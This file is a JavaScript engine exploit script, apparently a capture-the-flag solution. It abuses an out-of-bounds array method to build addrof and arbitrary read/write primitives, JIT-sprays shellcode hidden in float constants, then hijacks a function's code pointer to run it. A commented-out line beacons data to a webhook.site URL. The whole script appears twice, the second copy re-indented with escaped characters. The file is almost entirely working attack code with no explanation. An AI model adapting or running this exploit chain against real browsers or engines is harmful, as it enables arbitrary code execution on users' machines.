d4rk-kn1gh7/exp.js

## exp.js
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000

function f2i(f) {
    f64[0] = f
    return u32[0] + BASE*u32[1]
}
function i2f(i) {
    u32[0] = i % BASE
    u32[1] = i / BASE
    return f64[0]
}
function hex(x) {
    if (x < 0) return `-${hex(-x)}`
    return `0x${x.toString(16)}`
}

function println(data) {
    // navigator.sendBeacon("https://webhook.site/a4d54f3b-1de9-4f06-b5db-8126654a8e8c", data)
    print("[*] "+data)
}

let arr1 = new Array(10)
let arr2 = new Uint32Array(10)

arr1[0] = 13.37
arr2[0] = 0x1234

// dumpObject(arr1)
// dumpObject(arr2)

const offset = 0x11

const arr2_addr = f2i(arr1.oob(offset)) - 0x38
println("arr2 @ "+hex(arr2_addr))

function read(addr){
    arr1.oob(offset, i2f(addr));
    u32[0] = arr2[0];
    u32[1] = arr2[1];
    return f2i(f64[0]);
}

function write(addr, value){
    arr1.oob(offset, i2f(addr));
    f64[0] = i2f(value);
    arr2[0] = u32[0];
    arr2[1] = u32[1];
}

function addrof(obj) {
    arr1.oob(offset, i2f(arr2_addr + 0x38));
    arr1.oob(offset + 1, obj);
    u32[0] = arr2[0];
    u32[1] = arr2[1] & 0xffff;
    return f2i(f64[0]);
}

function read8f(addr){
    arr1.oob(offset, i2f(addr));
    u32[0] = arr2[0];
    u32[1] = arr2[1];
    return f64[0];
}

println("Testing primitives!");
const arr1_addr = addrof(arr1);
println("arr1 @ "+hex(arr1_addr))
println("value at array: "+hex(read(arr1_addr + 0x28)))

function func() {
    const magic = 4.183559446463817e-216;
    const a1 = 2.4877840611688293e-275;
    const a2 = 2.4879820007592195e-275;
    const a3 = 2.4879355641325583e-275;
    const a4 = 2.5047751329248284e-275;
    const a5 = 2.4881023834790942e-275;
    const a6 = -6.828523606692364e-229;
}

for (i = 0; i < 100000; i++) {
    func()
}

func_addr = addrof(func)
shellcode_addr = read(func_addr + 0x28)
rx_page = read(shellcode_addr)
println("func @ "+hex(func_addr))
println("shellcode @ "+hex(shellcode_addr))
println("rx @ "+hex(rx_page))

f64[0] = i2f(rx_page);
u32[0] = u32[0] & 0xfffff000;
jit_addr = f2i(f64[0]);

println("jit page @ "+hex(jit_addr))
// arr1.brk()

while(read8f(jit_addr) != 4.183559446463817e-216 || read8f(jit_addr + 0xe) != 2.4877840611688293e-275) {
    // println("searching @ "+hex(jit_addr)); //! Remove this print for the exploit to work
    jit_addr = jit_addr + 1;
}

println("found shellcode @ "+hex(jit_addr));
jit_addr = jit_addr + 14;
write(shellcode_addr, jit_addr);

// arr1.brk()
func()
	var tmp_buf = new ArrayBuffer(8)
	var f64 = new Float64Array(tmp_buf)
	var u32 = new Uint32Array(tmp_buf)
	var BASE = 0x100000000

	function f2i(f) {
	f64[0] = f
	return u32[0] + BASE*u32[1]
	}
	function i2f(i) {
	u32[0] = i % BASE
	u32[1] = i / BASE
	return f64[0]
	}
	function hex(x) {
	if (x < 0) return `-${hex(-x)}`
	return `0x${x.toString(16)}`
	}

	function println(data) {
	// navigator.sendBeacon("https://webhook.site/a4d54f3b-1de9-4f06-b5db-8126654a8e8c", data)
	print("[*] "+data)
	}

	let arr1 = new Array(10)
	let arr2 = new Uint32Array(10)

	arr1[0] = 13.37
	arr2[0] = 0x1234

	// dumpObject(arr1)
	// dumpObject(arr2)

	const offset = 0x11

	const arr2_addr = f2i(arr1.oob(offset)) - 0x38
	println("arr2 @ "+hex(arr2_addr))

	function read(addr){
	arr1.oob(offset, i2f(addr));
	u32[0] = arr2[0];
	u32[1] = arr2[1];
	return f2i(f64[0]);
	}

	function write(addr, value){
	arr1.oob(offset, i2f(addr));
	f64[0] = i2f(value);
	arr2[0] = u32[0];
	arr2[1] = u32[1];
	}

	function addrof(obj) {
	arr1.oob(offset, i2f(arr2_addr + 0x38));
	arr1.oob(offset + 1, obj);
	u32[0] = arr2[0];
	u32[1] = arr2[1] & 0xffff;
	return f2i(f64[0]);
	}

	function read8f(addr){
	arr1.oob(offset, i2f(addr));
	u32[0] = arr2[0];
	u32[1] = arr2[1];
	return f64[0];
	}

	println("Testing primitives!");
	const arr1_addr = addrof(arr1);
	println("arr1 @ "+hex(arr1_addr))
	println("value at array: "+hex(read(arr1_addr + 0x28)))

	function func() {
	const magic = 4.183559446463817e-216;
	const a1 = 2.4877840611688293e-275;
	const a2 = 2.4879820007592195e-275;
	const a3 = 2.4879355641325583e-275;
	const a4 = 2.5047751329248284e-275;
	const a5 = 2.4881023834790942e-275;
	const a6 = -6.828523606692364e-229;
	}

	for (i = 0; i < 100000; i++) {
	func()
	}

	func_addr = addrof(func)
	shellcode_addr = read(func_addr + 0x28)
	rx_page = read(shellcode_addr)
	println("func @ "+hex(func_addr))
	println("shellcode @ "+hex(shellcode_addr))
	println("rx @ "+hex(rx_page))

	f64[0] = i2f(rx_page);
	u32[0] = u32[0] & 0xfffff000;
	jit_addr = f2i(f64[0]);

	println("jit page @ "+hex(jit_addr))
	// arr1.brk()

	while(read8f(jit_addr) != 4.183559446463817e-216 \|\| read8f(jit_addr + 0xe) != 2.4877840611688293e-275) {
	// println("searching @ "+hex(jit_addr)); //! Remove this print for the exploit to work
	jit_addr = jit_addr + 1;
	}

	println("found shellcode @ "+hex(jit_addr));
	jit_addr = jit_addr + 14;
	write(shellcode_addr, jit_addr);

	// arr1.brk()
	func()